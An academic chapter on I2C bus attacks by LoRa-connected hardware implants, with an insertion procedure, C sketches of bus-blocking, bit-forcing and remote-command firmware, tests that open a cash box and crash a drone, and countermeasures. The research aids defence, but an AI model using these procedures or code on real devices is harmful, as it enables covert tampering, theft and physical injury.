Although serial communication interfaces have diverse properties regarding synchronization, data rates, and complexity, there are architectural similarities from a security perspective. The most obvious property of these systems is that none of their specifications defines any kind of cryptographic security measure. Therefore, the majority of the demonstrated attacks can also be adapted to other serial communication interfaces. In the implementation and evaluation of this work, we focus on the I2C serial bus [222] for the following reasons: I2C facilitates a sophisticated communication protocol, in contrast to UART and SPI. Furthermore, I2C and UART are the most widely supported serial communication interfaces, and in 32-bit architectures (which make up 61.2% of all evaluated MCU models), I2C is even the most supported serial communication interface.


Figure 4.1: An exemplary I2C bus system with a single master and three slaves.

As shown in Figure 4.1, I2C uses two signal lines: one clock line (denoted as SCL) and one data line (denoted as SDA). ICs are chained along these two signal lines, which are referred to as the bus. In order to request and send data from one IC to another, each IC has a distinct address. Furthermore, each IC can be configured to act either as a master or as a slave. The I2C standard supports multiple masters, which can initiate transactions on the bus. The master that currently performs a transaction also generates the clock signal. Slaves cannot start their own transactions and remain passive until they respond to the requests of masters. Typical examples of masters are MCUs and processors, while sensors, memory chips, and actuators are usually configured as slaves.

Figure 4.2: An I2C transaction consists of an address frame and one or more data frames.

A transaction between a master and a slave contains two types of frames (cf. Figure 4.2): an address frame that informs all participants on the bus for which slave the message is intended, and one or more data frames, each consisting of an 8-bit data block. To start a new transaction, a master sends a start condition indicating its intention to occupy the bus. If more than one master aims to use the bus at the same time, access is granted to the master that first pulls the SDA line together with a clock signal. The other masters wait until the current bus master completes its transaction via a stop condition. Upon receiving a start condition, all slaves on the bus listen for an address frame. The master sends the 7-bit address of the corresponding slave, after which only this particular slave continues listening. Then, the master sends an 8th bit to indicate whether it wants to write or read. Once these 8 bits are sent by the master, the addressed slave sends a bit to acknowledge its readiness to receive data. If no acknowledgment bit is received, the master aborts the transaction. After the address frame is sent, the transmission of the data frames starts. Depending on whether the master indicated its intention to read or write, either the master or the slave writes data on the SDA line and the corresponding device acknowledges the receipt. Finally, the master sends a stop condition to complete the transaction.
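The following sketch models this frame structure (start condition, address byte with R/W bit, acknowledgments, data frames, stop condition) at a purely conceptual level; it abstracts from electrical timing and clock generation, and the slave address and data bytes in the example are arbitrary.

```python
# Conceptual model of the I2C transaction format described above.
READ, WRITE = 1, 0

def address_byte(addr7: int, rw: int) -> int:
    """First byte on the bus: 7-bit slave address followed by the R/W bit."""
    assert 0 <= addr7 < 0x80
    return (addr7 << 1) | rw

def write_transaction(addr7: int, data: bytes):
    """Symbolic sequence of bus events for a master writing to a slave."""
    frames = ["START", f"ADDR 0x{address_byte(addr7, WRITE):02X}", "ACK"]
    for byte in data:
        frames += [f"DATA 0x{byte:02X}", "ACK"]
    frames.append("STOP")
    return frames

# Example: a master writes two bytes to the slave with (arbitrary) address 0x48.
print(write_transaction(0x48, b"\x01\x2A"))
```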


4.3 Threat Model

Serial communication on PCBs is security-critical, as many high-level applications rely on correct data transmissions to function properly. For instance, spoofing a temperature sensor with false values can have a significant impact on manufacturing processes that require a particular temperature. The injection of wrong gyroscope data into the serial communication of an unmanned aerial vehicle can lead to a crash. Eavesdropping on the passcode entered into the pin pad of a safe grants an attacker access to the content without using brute force. The manipulation of the loudspeakers in headphones can damage the hearing of the user. All these examples show that attacks on the serial communication between ICs can have serious impacts. To this end, we define the following security goals for the serial communication between ICs on PCBs:

(a) Confidentiality: Only legitimate ICs have access to the data that is transmitted on the serial bus.

(b) Integrity: Tampering with data on the serial bus during transfer is recognized by the legitimate ICs.

(c) Availability: The legitimate ICs always have access to the transmitted data on the serial bus.

In this chapter, we present a threat model that involves a so-called malicious IoT implant. Malicious IoT implants are electronic systems that are inserted into an existing system after the fabrication process and feature a direct, bidirectional wireless connection to a public IoT infrastructure. The system that hosts the implant is denoted as the target system. We refer to the entity that inserts the implant into the target system as the attacker. The objective of the attacker is to violate the security goals of the serial communication between ICs.

4.3.1 Untrusted Supply Chain

From an economic perspective, a supply chain can be described as a series of inter-related business processes ranging from the acquisition and transformation of raw materials and parts into products to the distribution and promotion of these products to retailers or customers [204]. The supply chain process can be divided into two main business processes: material management and physical distribution. In this work, we focus on the physical distribution, as malicious IoT implants are inserted into the target system after its fabrication. We identified a number of stakeholders that are involved in the physical distribution process shown in Figure 4.3: Manufacturers use raw materials and parts to produce goods. Distributors buy goods from manufacturers, store them, and resell them either to retailers or customers.


Retailers sell goods to customers. Third-party logistics providers manage the flow of goods between the point of origin and the destination, which includes shipping, inventory, warehousing, and packaging. Government agencies, e.g., customs inspections, enforce regulations and document the flow of goods in and out of a country. Customers receive and consume goods, while having the ability to choose between different products and suppliers. Hence, the physical distribution process provides many entry points for attackers to gain physical access to a target device. Potentially, any of these stakeholders can either be an attacker or cooperate with an attacker. Therefore, we assume an untrusted supply chain in our threat model.

Figure 4.3: Physical distribution of goods in the supply chain process. Solid lines: flow of goods. Dashed lines: flow of services (third-party logistics providers) or possibility of interception (government agencies).

4.3.2 Attacker Model

We assume that the attacker has physical access to the target device as described in Section 4.3.1, and is able to remove the device's enclosure without leaving physical traces. The attacker identifies access points on the PCB to which a malicious IoT implant can be connected within a reasonable amount of time. We further assume that the target device only requires a power supply; neither Internet nor network access is necessary. The attacker succeeds with an attack if the implant is able to interfere with the communication of the serial buses and cannot be detected without opening the enclosure of the product. Thus, we assume that the attacker targets systems that are not likely to be disassembled by the user. Furthermore, we assume that the attacker has access to a public IoT infrastructure within the wireless range of the implant. In this case, the attacker is not required to be physically present within the wireless range of the implant. There are various motivations for utilizing malicious IoT implants. Governmental organizations might have an interest in using this approach for surveillance, industrial espionage, or the manipulation of infrastructure in enemy states. Leaked documents of the National Security Agency [13] indicate the usage of similar malicious hardware for these purposes.


Besides governmental entities, criminal organizations and terrorist groups can use malicious IoT implants to achieve similar goals for financial and political profit. All these groups are likely to be experienced in covert operations and have the potential to access target devices in the supply chain. We further categorize the potential motivations of an attacker to interfere with serial communication on PCBs into four high-level objectives:

1. Disable Services and Infrastructure: The attacker can use a malicious IoT implant to completely disable a serial communication bus of a device. As a result, an MCU or processor cannot communicate with peripheral ICs anymore. This immediately leads to consequences in high-level applications.

2. Bypass Security Mechanisms: Due to the implant's ability to directly interfere at the hardware level, security mechanisms at the software level can be overruled. An example is a lock using an authentication mechanism such that only authorized people can unlock it. A malicious IoT implant can bypass such security mechanisms and send commands directly to the actuator that controls the lock.

3. Bypass Safety Mechanisms: Safety mechanisms can be overruled in the same way as security mechanisms. An example is a software-implemented safety mechanism that controls the closing of an elevator door, which can be circumvented by a malicious IoT implant and, as a consequence, injure passengers.

4. Exfiltrate Data: A malicious IoT implant can eavesdrop data and commands on the serial bus and forward them via the implant’s wireless interface to the attacker. This way, an attacker gains information about the current state of a device. Also, the attacker might be able to extract secrets, e.g., a passcode entered into a pin pad, or a production machine configuration that reveals a company secret.


In this section, we present the design and implementation of the malicious IoT implant.

4.4.1 Design Criteria

To achieve its objectives, the attacker has certain design criteria regarding the malicious IoT implant:

(C1) Small Dimensions: Size is a constraint as the implant has to be hidden inside the enclosure of the target device. In addition, small dimensions of an implant make detection harder.


(C2) Wireless Connectivity: If the implant is to be remotely controlled, it requires a radio transceiver. This transceiver should provide a communication interface to an LPWAN infrastructure such that the physical presence of the attacker is not required.

(C3) Access to Serial Communication: The implant acts as a legitimate participant on the serial bus and is able to eavesdrop on legitimate transactions and to insert malicious transactions.

(C4) Invisibility: The implant does not influence the normal mode of operation except during an active attack.

(C5) Low-Power: The implant is either powered by an external power source, i.e., a battery or accumulator, or supplied with power from the target device. To increase the lifetime of the implant as well as of the target device, the implant should consume as little energy as possible.

(C6) Low-Cost: The implant should be designed in a low-cost way using mainly off-the-shelf components.

To the best of our knowledge, we are the first (in a scientific context) to design and implement an implant that fulfills all of these design criteria.

4.4.2 Attack Procedures

To achieve the attacker’s high-level objectives, we propose hardware-level attacks that interfere with the communication on the serial bus. To perform these procedures, the implant must be connected to the SDA and SCL signal lines of the target device.

1. Eavesdropping: Eavesdropping is a passive attack in which the implant observes and stores data that is transmitted on the I2C bus. This data can then be relayed to the attacker via the wireless interface of the implant.

2. Denial-of-Service: A DoS disables all communication on the I2C bus. A malicious IoT implant can perform such an active attack by permanently pulling the SDA and SCL lines to a low voltage state. As a result, no further data can be transmitted on the bus. All other bus participants have to wait until the implant releases the signal lines.

3. Injection of Transactions: In this active attack, the implant acts as an additional master on the bus. Most implementations offer time gaps between transactions, in which the masters and slaves are in an idle state. The implant can execute its own transactions on the bus during these periods. The injection of own transactions enables further attacks: a) Read out memory and configurations: The implant can read out data from memory chips as well as the configurations of slaves. This information can then be exfiltrated to the attacker via the wireless interface.


b) Reconfiguration: The implant can send commands to modify the configuration of slaves consistently. For example, a pre-configured threshold can be altered or, in some cases, a slave could be completely disabled. This ultimately allows for slave impersonation attacks, in which the implant responds to messages of the legitimate master instead of the disabled slave.

4. On-The-Fly Bit Modification: Whenever a logical 1 is sent on the I2C bus, the transmitting IC releases the SDA signal. A pull-up resistor connected to SDA then pulls the voltage of the signal to a high level, and the next clock pulse carries the bit value. As an active attack, the implant can exploit this released state and pull the SDA signal to a low level, which results in the transmission of a logical 0 instead of the intended logical 1 on the bus. Due to the electrical characteristics of the I2C bus, a modification of a logical 0 into a logical 1 is not possible.
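To illustrate these bus-level procedures, the following minimal sketch shows how the denial-of-service and on-the-fly bit-modification attacks could be realized on an MCU whose open-drain GPIO pins are wired to SDA and SCL. The pin assignment and the use of the STM32 HAL are illustrative assumptions and do not reproduce the implant's actual firmware.

    /* Sketch only: assumes PB7 = SDA and PB6 = SCL, both configured as
     * open-drain outputs that idle high (released); pin names and wiring
     * are assumptions made for illustration. */
    #include "stm32f3xx_hal.h"

    #define SDA_PORT GPIOB
    #define SDA_PIN  GPIO_PIN_7
    #define SCL_PORT GPIOB
    #define SCL_PIN  GPIO_PIN_6

    /* Denial-of-service: hold both lines low so that no START/STOP condition
     * and no data bit can be signalled until the implant releases the bus. */
    void i2c_bus_block(void)
    {
        HAL_GPIO_WritePin(SDA_PORT, SDA_PIN, GPIO_PIN_RESET);   /* pull SDA low */
        HAL_GPIO_WritePin(SCL_PORT, SCL_PIN, GPIO_PIN_RESET);   /* pull SCL low */
    }

    void i2c_bus_release(void)
    {
        HAL_GPIO_WritePin(SDA_PORT, SDA_PIN, GPIO_PIN_SET);     /* release SDA  */
        HAL_GPIO_WritePin(SCL_PORT, SCL_PIN, GPIO_PIN_SET);     /* release SCL  */
    }

    /* On-the-fly bit modification: while SCL is low (bit set-up phase) and the
     * transmitter has released SDA to signal a logical 1, pull SDA low so that
     * the receiver samples a logical 0 during the SCL high phase.  A real
     * implementation must additionally track the bit position within the
     * transaction and meet tight timing constraints, which is omitted here. */
    void i2c_force_zero_bit(void)
    {
        while (HAL_GPIO_ReadPin(SCL_PORT, SCL_PIN) == GPIO_PIN_SET)
            ;                                       /* wait for SCL low (set-up)  */
        if (HAL_GPIO_ReadPin(SDA_PORT, SDA_PIN) == GPIO_PIN_SET)
            HAL_GPIO_WritePin(SDA_PORT, SDA_PIN, GPIO_PIN_RESET);  /* force 1 -> 0 */
        while (HAL_GPIO_ReadPin(SCL_PORT, SCL_PIN) == GPIO_PIN_RESET)
            ;                                       /* wait for the SCL rising edge */
        while (HAL_GPIO_ReadPin(SCL_PORT, SCL_PIN) == GPIO_PIN_SET)
            ;                                       /* hold SDA low over the sampling window */
        HAL_GPIO_WritePin(SDA_PORT, SDA_PIN, GPIO_PIN_SET);        /* release SDA  */
    }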

4.4.3 Implementation

Wireless Connectivity. We use the LoRa technology (cf. Section 4.2.1) as the wireless communication interface of the implant. Competing LPWAN standards [3], such as SigFox, Weightless, and LTE Narrowband IoT, exist, but none of them is currently supported by a community of industrial and private partners as large as LoRa's. However, the presented attacks could also be facilitated using one of these LPWAN technologies. TTN acts as service provider to connect the implant to the Internet using LoRa communication. Application builders can register an account on the TTN website and get access to the network infrastructure in order to connect to their deployed IoT nodes via LoRaWAN. An account can be created easily using a user name, email address, and password. The purpose of the application is not checked by TTN.

Hardware Architecture. The hardware architecture of the implant consists of a PCB that is equipped with various ICs as shown in Figure 4.4. The implant can be connected to a power source that provides an input voltage between 3.3 V and 16 V. Power can be supplied via the VCC and GND pads, either from the target device or from a battery. The front side of the implant features a power converter, an I/O interface, an MCU, a number of capacitors, as well as an optional indicator LED. This LED is activated when the implant is supplied with power and blinks each time a LoRa message is sent or received. The MCU STM32F303CBT6 [281] contains an ARM Cortex-M4 core and 128 Kbytes of flash memory. The radio transceiver RFM95W-868S2 [130] is mounted on the back side of the implant. This module supports the LoRa technology and uses the 868 MHz frequency band. We soldered a simple wired monopole antenna of length 86.4 mm (a quarter of the 868 MHz wavelength) to the transceiver. For programming and debugging, a serial wire debug (SWD) interface is added to the implant. This interface can be physically removed (by breaking or cutting it off) after the final version of the firmware is installed.


Figure 4.4: Components of the malicious IoT implant: (1) indicator LED, (2) power converter, (3) I/O interface for serial bus signals (SDA, SCL) and power supply (VCC, GND), (4) removable programming and debug interface, (5) MCU, (6) wired monopole antenna, (7) LoRa radio transceiver.

Software Architecture. The software architecture is based on the STM32CubeMX platform [282], which includes the hardware abstraction layer and the link layer for the MCU. The real-time operating system FreeRTOS builds on top of this vendor-specific platform. A number of libraries are installed: The board support package provides drivers for the interfaces of the implant. The LMiC library [158] implements the LoRaWAN stack and communicates with the LoRa module. The Arduino JSON library is used to decode and encode the JSON-formatted payloads of the LoRa messages. On top, so-called 'tasks' are defined. For example, the 'attack task' implements the attack procedures, while an 'LED task' defines the state of the indicator LED. The implant is registered as an application belonging to the TTN account of the attacker and can be operated via the TTN web console.
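The following sketch outlines how such an 'attack task' could be structured on top of FreeRTOS, assuming a command queue that the LoRaWAN receive path fills after decoding a downlink payload. The command codes, queue, and function names are assumptions made for illustration, not the implant's actual firmware.

    /* Sketch only: command codes and task wiring are illustrative assumptions. */
    #include "FreeRTOS.h"
    #include "queue.h"
    #include "task.h"

    typedef enum { CMD_EAVESDROP, CMD_DOS_START, CMD_DOS_STOP, CMD_INJECT } attack_cmd_t;

    static QueueHandle_t attack_queue;

    /* Bus-level procedures from the sketch in Section 4.4.2. */
    extern void i2c_bus_block(void);
    extern void i2c_bus_release(void);

    /* Called by the LoRaWAN receive path after decoding the JSON payload of a
     * downlink message into a command code. */
    void lora_downlink_decoded(attack_cmd_t cmd)
    {
        xQueueSend(attack_queue, &cmd, 0);
    }

    /* The 'attack task': blocks until the attacker issues a command via
     * LoRaWAN, then dispatches to the corresponding attack procedure. */
    static void attack_task(void *arg)
    {
        attack_cmd_t cmd;
        (void)arg;
        for (;;) {
            if (xQueueReceive(attack_queue, &cmd, portMAX_DELAY) == pdTRUE) {
                switch (cmd) {
                case CMD_DOS_START: i2c_bus_block();   break;
                case CMD_DOS_STOP:  i2c_bus_release(); break;
                case CMD_EAVESDROP: /* sample SDA/SCL and buffer observed frames */ break;
                case CMD_INJECT:    /* act as additional master in an idle gap   */ break;
                }
            }
        }
    }

    void attack_task_init(void)
    {
        attack_queue = xQueueCreate(8, sizeof(attack_cmd_t));
        xTaskCreate(attack_task, "attack", 512, NULL, tskIDLE_PRIORITY + 2, NULL);
    }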

4.5 Evaluation

We present the results of our evaluation in this section and describe the effort and consequences of inserting a malicious IoT implant into real-world products.

4.5.1 Dimensions

Small dimensions are crucial in order to insert the implant into arbitrary target systems and, furthermore, to avoid visual detection. The implant has a size of 19.5 x 17.8 mm and a height of 4.5 mm. We measured the weight of the implant to be 3 grams. Note that these dimensions are measured without the debug header, antenna, and wires connected to the target. We assert that the dimensions of the implant are small enough for many threat scenarios in which the enclosure provides a suitable amount of space. We assume that the layout of malicious IoT implants can be further minimized if we forgo the use of off-the-shelf hardware components.


4.5.2 Power Consumption

The malicious IoT implant has to be powered either by the power supply of the target device or by an external battery. We determined that the power consumption of the implant during sleep mode (i.e., the radio is duty cycling) is 110 µA at 3.3 V input voltage, while the implant consumes around 42 mA in attack mode (i.e., the radio listens continuously). For comparison: a regular 3.7 V lithium polymer battery with a capacity of 2000 mAh supplies an implant in sleep mode for more than two years, or for 176 hours in attack mode. Thus, attackers can wake a sleeping implant even months after its insertion into the target device.
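As a rough check of the sleep-mode figure (neglecting battery self-discharge and converter losses):

    $2000\,\text{mAh} \,/\, 0.110\,\text{mA} \approx 18{,}200\,\text{h} \approx 2.1\,\text{years}$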

4.5.3 Wireless Range

The wireless range determines from which distance an attacker is able to remotely control a malicious IoT implant. It also indicates in which areas the implant is covered by an LPWAN. The implant utilizes the LoRa technology, which achieves a wireless range of 2-5 km in urban areas and up to 15 km in suburban areas [3]. It is hard to make general statements about the wireless range of the implant as the propagation of radio waves depends on many variables, e.g., the enclosure of the target device, building structures and walls, nearby electrical installations, as well as other deployed wireless networks that interfere with the LoRa frequency bands.

4.5.4 Cost

Once we have the final schematics, we are able to build a batch of 10 implants for hardware costs of approximately 194 Euros. The cost per unit decreases with increasing batch size: for a batch size of 100 units, the hardware costs add up to around 1075 Euros. Thus, we can build a malicious IoT implant using mainly off-the-shelf components for less than 11 Euros per unit (assuming a batch size of 100 units). These costs comprise the customized PCB as well as all electronic components including MCU, radio transceiver, LED, power converter, and capacitors. Not included are laboratory equipment, labor costs, shipping costs, and consumable materials.
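For reference, the per-unit figures follow directly from the batch prices: $194\,\text{EUR} / 10 = 19.40\,\text{EUR}$ for the small batch and $1075\,\text{EUR} / 100 \approx 10.75\,\text{EUR}$ for the larger batch.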

4.5.5 Effort of Insertion

The procedure of implanting malicious hardware into the target device consists of three steps: identifying access points on the PCB, analyzing the communication on the bus, and inserting the implant into the device. In the first step, we open the case of the target device and check whether there is enough space to insert the implant. If so, we identify the PCBs and list the descriptors of all ICs. Then, we search the Internet for the datasheets of these ICs.


The identification of ICs on a PCB can also be automated using image recognition [155]. A datasheet usually contains a feature description as well as a pin layout, which we use to identify ICs that support I2C. After we confirm that an IC supports I2C, we check whether the I2C pins are used. Optical indications are signal lines on the PCB that are connected to these pins. Then, we look for suitable solder points on the PCB where we can later attach the wires of the implant. It is not advisable to directly solder the wires onto the pins of an IC since this requires a very precise way of working and can easily lead to damage or electrical shorts with neighboring pins. Good access points are larger solder joints, for example, at surface-mounted capacitors or at through-hole connections.

In the second step, we use a logic analyzer to inspect the communication on the bus. Using logic diagrams, we identify the ICs that communicate with each other, the bus frequency, and the transmitted data (datasheets might help again). Based on these findings, we configure the software of the implant accordingly.

In the third step, we solder wires onto the access points after we have removed the power supply and batteries. Then, we attach the wires to the implant. If required, we fixate the implant within the target device such that the antenna does not touch other electronic parts. We supply the target device with power again, and if the insertion was successful, the indicator LED on the implant turns on. In addition, we test whether the implant can be remotely controlled. Finally, we close the casing of the target device and try to remove all traces of this modification procedure.

The danger of damaging the PCBs during the insertion of the implant is low if we take standard precautions: The process of insertion should be performed in an electrostatic discharge protected area. In this area, all conductive materials and workers are grounded, and mechanisms to prevent the build-up of electrostatic charges should be in place. Furthermore, the power supply needs to be safely removed to prevent electrical shorts. Then, the danger of damaging the target device is mainly reduced to the threat of thermal influences on the ICs from the soldering process and physical damage.

In the physical distribution process, time is crucial. Thus, the time required to insert the implant into the target system must be short. If we want to insert the implant into a large batch of similar target devices, the customization of the implant is only required once. From our experience, the process of customization can add up to a few hours. The insertion process needs to be performed for each target device. In our experiments, the manual insertion of the implant took a few minutes; in some cases, we were even able to insert the implant in less than a minute.

4.5.6 Feasibility of Attacks

We demonstrate the feasibility of the attacks outlined in Section 4.4.2 by inserting the malicious IoT implant into three exemplary target devices: one evaluation board and two real-world products. We selected the real-world products by searching online databases of disassembled products, e.g., iFixit, for security- and safety-relevant devices that indicate the use of I2C communication.


Figure 4.5: Malicious IoT implant (green PCB) inserted into exemplary target devices: (a) cash box, (b) drone (implant with debug header).

Evaluation Board. The first hardware platform is an evaluation board that was specifically designed to test the implementation of the implant. It imitates a monitoring application that observes the temperature of an industrial manufacturing process. If the temperature exceeds or undercuts a preconfigured threshold, an alarm is triggered and the light of an LED warns the operator. From a technical perspective, the MCU reads temperature sensor data from the registers of the sensor via I2C and shows the value on an LCD. The lower and upper bounds of the temperature threshold are stored in the registers of the temperature sensor.

After attaching the implant to the SDA and SCL solder pads of the evaluation board, we are able to perform all attacks described in Section 4.4.2. During sleep mode, the implant does not interfere with the normal operation of the evaluation board. In attack mode, the implant eavesdrops the current temperature values as well as the threshold configuration, both of which are requested multiple times per second by the MCU. The implant then relays these values to the attacker's operator interface. Upon receiving the DoS command from the attacker, the implant disables all communication on the bus. On the target device, the MCU cannot read data from the sensor anymore and throws an exception, which results in a bus error message on the display. Furthermore, the implant can inject its own transactions to read the data stored in the registers of the sensor and to write new values to the registers. This way, the attacker is able to reconfigure the threshold that triggers the alarm. Finally, we are able to manipulate legitimate temperature values on the bus by performing the on-the-fly bit modification attack. As an example, we changed one bit of a temperature value byte such that the bus transferred 0x0F instead of 0x8F. As a result, the MCU reads a temperature of 15.9 °C instead of 28.9 °C.
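In binary, this manipulation forces the most significant bit of the transferred byte from 1 to 0, which is exactly the only direction of change that pulling SDA low permits:

    $\mathtt{0x8F} = 1000\,1111_2 \;\longrightarrow\; 0000\,1111_2 = \mathtt{0x0F}$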

Cash Box. As a second hardware platform, we inserted the implant into a First Alert 3040DFE cash box that allows access by entering a pin into an electronic pin pad. Each time a pin is entered into the pin pad, the MCU uses I2C communication to read the master pin stored in an EEPROM. If the entered pin matches the master pin, the content of the cash box can be accessed. The master pin is set by pushing a red button that is located inside the cash box and then entering the new master pin twice into the pin pad. Assuming that the attacker inserts the implant at some point during the physical distribution process, the attacker is later able to eavesdrop and set the master pin, and thus, to access the content of the box.

As shown in Figure 4.5a, we attached the SDA and SCL wires of the implant to solder points of a pull-up resistor and the reset button, respectively. To supply the implant with power, we attached the VCC and GND wires to solder points connected to the batteries of the cash box. The enclosure of the cash box provides plenty of space for the implant and a wired monopole antenna.

Controlling the implant from the operator interface, we performed eavesdropping, DoS, and the injection of transactions. First, the attacker is able to monitor the bus to retrieve the master pin that is requested by the MCU each time a pin is entered into the pin pad. The implant then exfiltrates the master pin via the wireless interface. In addition, the implant can disable all I2C communication upon receiving a DoS command from the attacker. Then, the MCU cannot read the master pin from the EEPROM anymore, and thus, does not unlock the cash box. During the evaluation, we detected a manufacturer-specific modification of the I2C bus: during idle times, the master constantly writes an oscillating signal on the SDA line. This signal clears for around 300 ms after a button on the pin pad is pushed. Since the attacker cannot inject own transactions as long as the oscillating signal is occupying the SDA line, the implant has to wait to execute its transactions until the user pushes an arbitrary button on the pin pad. By injecting its own transactions, the attacker can read the master pin from the EEPROM and also set this pin to an arbitrary value. During sleep mode, the implant does not influence the normal operation of the cash box.

Drone. We used a Syma X5C-1 drone as the third hardware platform to evaluate the malicious IoT implant. The drone features a gyroscope and accelerometer sensor that stabilizes the drone during flight. An MCU reads data from this sensor every 3 ms using I2C communication and subsequently adjusts the individual speed of the four rotors according to the flight position.

As depicted in Figure 4.5b, we attached the SDA and SCL wires of the implant to a pin of the MCU as well as a pin of the sensor. Also, we attached the GND and VCC wires to solder points that are connected to the battery power supply of the drone. The body of the drone provides enough space for the implant and its antenna. Also, the drone is capable of carrying the implant without any effects on its flight characteristics. During sleep mode, the implant does not affect the normal operation of the drone.

We performed eavesdropping and DoS attacks on the drone. Using the implant, the attacker can eavesdrop on the sensor data that is requested by the MCU. This sensor data contains triple-axis angular rates as well as triple-axis accelerometer data. Parts of this aggregated information can be sent to the attacker at regular intervals. Upon receiving a DoS command from the attacker, the implant blocks the I2C bus by pulling both lines to low. The MCU of the drone cannot read data from the gyroscope and accelerometer anymore, and thus, the speed of the rotors is no longer adjusted. In consequence, the flight position of the drone destabilizes and the drone hits the ground.


4.6 Discussion

The results of our evaluation underline two major threats. As a first threat, the emergence of IoT infrastructure provides novel attack vectors besides DoS attacks on Internet infrastructure [12, 157]. As we demonstrate, malicious IoT implants connected to LPWANs can be leveraged to exfiltrate secret information, manipulate the functionality of target devices, and, in the worst case, might even pose a threat to humans. Such attacks can be performed anonymously, as one can register an account and set up the application without any identification on the website of the LoRaWAN service provider TTN. Furthermore, the attacker can control the implant from a remote location over the Internet. These attacks are not specific to LoRaWAN and can also be performed using other competing LPWAN standards. We note that the usage of traditional mobile telephony infrastructure (e.g., GSM and LTE) would not satisfy the design criteria given in Section 4.4.1 since a GSM or LTE radio transceiver consumes more energy, the attacker would have to pay for data transmissions, and in most countries a SIM card registration requires an official identification document. The effort of building such an implant is relatively low for experts since the hardware and software design is based mainly on off-the-shelf components and open-source software, respectively. Thus, the dissemination of LPWANs opens up new attack vectors that did not exist when traditional mobile telephony infrastructure was the only wide-area connectivity provider.

As a second threat, serial communication on PCBs is vulnerable to malicious hardware inserted during physical distribution in the supply chain. While the presented malicious IoT implant is tailored to attack I2C buses, it could be adapted to other serial communication systems, such as UART and SPI, with reasonable effort. However, we might only be able to apply a subset of the presented attacks to other bus systems due to different approaches in the electronic design of these systems. In contrast to other serial buses, I2C facilitates a communication protocol that allows multiple masters on the bus. Since the implant acts as a master, the injection of own transactions in SPI and UART communication is not easily possible. Nevertheless, we can eavesdrop on the communication between ICs to exfiltrate information and perform DoS attacks by pulling all lines of the communication system to a low voltage state. As shown in our evaluation, both attacks had a significant impact on the security and reliability of the target devices.

One might ask why attackers should use malicious IoT implants when malicious software (malware) could do the same job. Although we agree that the effort of facilitating malware might be lower, malware falls short in several scenarios. First, if the target device has no Internet connection, then malware usually has no communication channel to the attacker. For this reason, none of our three evaluation devices could be remotely attacked using malware due to missing network interfaces. Second, malware cannot directly interfere with serial communication at the hardware level, which is required, e.g., to circumvent software protection mechanisms. Third, malware could be detected by other software, in contrast to implants, which are "invisible" at the software level. During the evaluation, the implant had no influence on the regular operation of the target device except while the attacker performed an attack.


Since the attacks directly influence the communication at the hardware level, an incident investigator is not able to find digital traces in the log files of the target device's software. The only indications might be exceptions triggered by the MCU and physical evidence, e.g., the presence of an implant or traces on the PCB indicating that an implant was attached.

So far, malicious IoT implants have been considered neither in theoretical hardware security models nor in practical approaches to secure hardware against malicious modifications. Since we demonstrated the feasibility of these threats, we conclude that future hardware security efforts have to take implants into account.

4.6.1 Limitations

The threat of LPWAN-connected malicious IoT implants comes with a number of limitations for attackers. Each implant needs to be inserted manually, which renders this attack procedure unsuitable for large-scale operations in which thousands of devices have to be modified. Furthermore, expert knowledge in electronics engineering and software programming is necessary for the preparation and insertion of an implant. Moreover, a number of potential target devices, e.g., mobile phones and tablets, might not provide enough space within the enclosure to carry an implant that is designed using mainly off-the-shelf components. Also, the feasibility of utilizing an LPWAN-connected implant is limited by the coverage of the selected service provider's LPWAN infrastructure. Finally, the amount of exfiltrated data is restricted since LPWANs only provide low data rates to achieve their low-power objectives. Nevertheless, the bandwidth between implant and attacker is sufficient for most threat scenarios.

4.6.2 Countermeasures

We analyze a variety of potential approaches to counter malicious IoT implants, which we divide into detection and safeguard mechanisms. While detection mechanisms disclose the presence of a malicious IoT implant in a system, safeguard mechanisms prevent an implant from interfering with the serial communication.

Detection Mechanisms. A trivial approach to detect malicious IoT implants is visual inspection of the PCBs. The advantage is that no expensive equipment is required. On the other hand, this requires the removal of the enclosure for most products, which can be quite a cumbersome task since many products are not intended to be disassembled. Therefore, this approach becomes impractical if large batches of products need to be investigated. Also, future implant layouts might become smaller and could be embedded into PCBs disguised as legitimate ICs, which makes visual detection much harder and more time-consuming. In addition, non-expert users might not be able to recognize malicious hardware elements if the implant is camouflaged as a legitimate part of the PCB.


Since malicious IoT implants have a physical appearance, another detection approach is to compare the weight of a suspicious product with the weight of an evidently unmodified product. The advantage of this approach is its low cost, as only a precision scale is needed. The disadvantage is that an attacker can potentially offset the weight of the implant by removing small pieces of the enclosure. Also, this approach is not suitable for heavy devices since the weight of the implant might be hidden within the measurement tolerance.

In anomaly detection, potential side-channel effects resulting from the presence of an implant are observed. For instance, the implant consumes a certain amount of power, as evaluated in Section 4.5.2, which might be supplied by the host system. Thus, the power consumption of manipulated products should show anomalies compared to unaltered products. Also, malicious IoT implants provide a wireless interface that emits radio waves, which can be detected with special equipment. The advantage of anomaly detection procedures is their potential for large-scale automation. The disadvantage is the need for hardware extensions on the products or special equipment in testing facilities.
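As an illustration of the power-consumption variant, the following sketch flags a device whose averaged supply current deviates from a reference profile by more than a fixed margin. The measurement interface read_supply_current_ma() and the chosen margin are hypothetical; a practical detector would compare against a calibrated per-product profile.

    /* Sketch only: read_supply_current_ma() and the margin are hypothetical. */
    #include <stdbool.h>
    #include <stddef.h>

    #define SAMPLES   1000
    /* The margin must be tighter than the implant's additional draw of roughly
     * 0.11 mA in sleep mode (cf. Section 4.5.2) to be useful. */
    #define MARGIN_MA 0.05

    extern double read_supply_current_ma(void);   /* external current probe */

    bool supply_current_is_anomalous(double reference_ma)
    {
        double sum = 0.0;
        for (size_t i = 0; i < SAMPLES; i++)
            sum += read_supply_current_ma();
        double mean = sum / SAMPLES;

        /* Flag the device if the averaged draw deviates beyond the margin. */
        return (mean > reference_ma + MARGIN_MA) || (mean < reference_ma - MARGIN_MA);
    }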

Safeguard Mechanisms. Another way to protect against the insertion of malicious IoT implants is adding tamper-evident features. For example, the packaging of a product can be sealed in such a way that the attacker cannot access the product without irreversibly destroying the seal. Also, physical security measures, such as a locked encasement or resin encapsulation, could be in place to protect the PCB against tampering. Tamper resistance does not always prevent the insertion of an implant, but it increases the attacker's effort and makes the detection of malicious actions much more likely.

Cryptographic security measures can prevent malicious IoT implants from reading messages on and injecting messages into serial buses. Lazaro et al. [171] proposed an authenticated encryption scheme for I2C buses. In their proposal, the I2C data frames are encrypted and authenticated using AES-GCM, while addressing frames are not protected. The calculation of ciphertext and authentication tag is directly implemented in the master and slave ICs. The authors assume a key pre-installed on each IC in a secure environment. The advantage of encryption is that it provides an efficient way to lock out non-authorized entities. As a disadvantage, all ICs on the bus must implement the encryption mechanism and need to be equipped with key material. Most probably, this requires a change of the I2C specifications.
